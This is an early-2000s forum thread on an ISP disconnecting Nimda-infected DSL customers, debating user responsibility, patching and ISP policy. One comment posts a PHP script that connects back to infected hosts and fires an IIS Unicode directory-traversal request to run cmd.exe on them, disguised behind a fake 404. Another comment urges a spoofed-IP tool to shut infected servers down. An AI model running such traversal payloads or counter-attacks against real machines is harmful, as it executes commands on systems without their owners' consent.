Shutting Down Worm-Infected Broadband Users

disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.

Pay for Fixes? Not paying attention

I like the comment that Microsoft doesn't fix these issues without the user paying a subscription, or whatever crap MoronTaco is spewing forth today. For his information, every single exploit Nimda uses has been patched. Some have been patched as long as a year ago. These patches are, and have always been, downloadable for free. Windows Update and Windows Update Critical Updates Service will inform users of these patches when they come out. FUD spewing morons.

my company does the same thing...

[uberbastard]

i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.

however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.

i give up.

Re:The stick and carrot

[Telek]

how long has CodeRed been known about now?

Never mind that how long has the patches been available and posted prominantly on the MS web site listed under "critical updates"?

Answer, much longer. IIRC several months prior to CodeRed coming out.

It doesn't take a lot of work to pop on by to MS every now and then and download any critical/recommended patches. However it's pretty clear that most of these people aren't even aware that they were running a website, much less infected. However you must have had your head under a rock for a while to not have heard about it in the news. Bah, someone just write a proggy that shuts down these servers (one that works) and then go through the DShield database and shut'em all down. You could fake the IP address so it wouldn't be traceable anyways, or at the very least make it a program that you could give to ISPs so that they could run it against their networks to shut down anyone with these servers still running. But I guess that it's just as easy to have them terminate their client's connection. Bah.

The problem, here, I would think, is that these boxen are probably sitting somewhere on the net not being maintained. I mean any sysadmin, or even any user who circuits the web should have heard about it by now. If they haven't, then they're most likely not really using the web on that connection, in which case cutting them off won't really get their attention (not directly at least) anyways.

I wonder if there is any statistics on, in the past month, the boxes that have been recognized by their owners and patched. I find it hard to believe that you could account for the (still) 150+ CR hits a day that I get by just "ignorant" people or crappy sysadmins.

[/ramble]

Re:Arbitrary Decisions

[Telek]

I pay for DSL, i can run *WHATEVER* i want on it.

bull... what company do you go by that doesn't have a hugeass EULA?

And keep in mine that EULAs and any sort of contract is 98% CYA... It's there with tonnes of clauses that you will violate every day but are there so that if you do something stupid, they have a contract saying that you're not allowed to do that. If everyone were to go 100% by their contract, they wouldn't be using the web at all. Yes, this does give them excessive power, but they don't exercise it unless they need to, which is why they still have clients. Same reason why noone reads the EULAs on software, they just click "yeah I agree lets get on with it". The EULAs are there so if you do something annoying, they can nail you for it.

NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS

SO DON'T SIGN IT. It's your choice to sign up for an ISP that has a crazyass EULA. As long as there is competition there will be resonable TOSs, and when there isn't, that's where the goverment is supposed to step in to limit what they can do.

I think that you're going a little haywire thou with your freedom thing. Try to redirect some of that energy to what's happening in the aftermath of the attacks, or towards MPAA or RIAA.

My Script to warn infected users

[tommyServ0]

I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"

<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
/* Check to see if the connection actually opened */
if ($fp)
{
/* URL-encode the message... */
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
/* ...and send it */
fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
fclose ($fp);
}

/* for fun and confusion.. */
header ("HTTP/1.0 404");

echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");

$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?

Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this:

AddType application/x-httpd-php .php .php3 .exe

Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart

That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimba.log.

Re:Why?

[mjh]

They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

I don't believe that is the reason why the provider shutdown their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all user's subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.

If they don't know about, or stop the virii, they end up with bad trending data. The trending data is what they used to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider know that the trending data is bad, they have one of two choices:

1. Fix the problem causing the bad trending data - i.e. turn off users who are infected. Hopefully, they will use good identification techniques to determine which users are actually infected. I wouldn't be surprised to see some providers who simply turn off any user who has used more than the expected bandwidth assuming that it must mean that they are infected.
2. Try and explain to their management why the trending data is bad, and why it's conclusions should be ignored. This of course has the added disadvantage that even though the data is bad, customers are still experiencing denial of service.

I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some consession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.

Re:Why?

[monkeydo]

One tiny, preventable worm

So, why didn't you prevent it? Does your company's business continuity planning not take into account what happens if you can't get to the net? Or is your business so dependant on the Internet that not being able to use it means shutting down? If the former is the case you need to fire whoever is in charge of your network operations, and if the later is the case you need to, well, fore whoever is in charge of your network operations.

It appalls me that this sort of thing is allowed to happen and people aren't held responsible. If this worm cost your company that much money, it definatly should have been forseeable and preventable. This is why users at most companies hate IT, it's because IT at most companies SUCK. Networks do not have to be unreliable, At the company I work for we have several divisions in one building, one of our divisions was infected and we had to isolate them. The divisions I am responsible for were not affected. It wasn't luck, it's called planning and preparedness.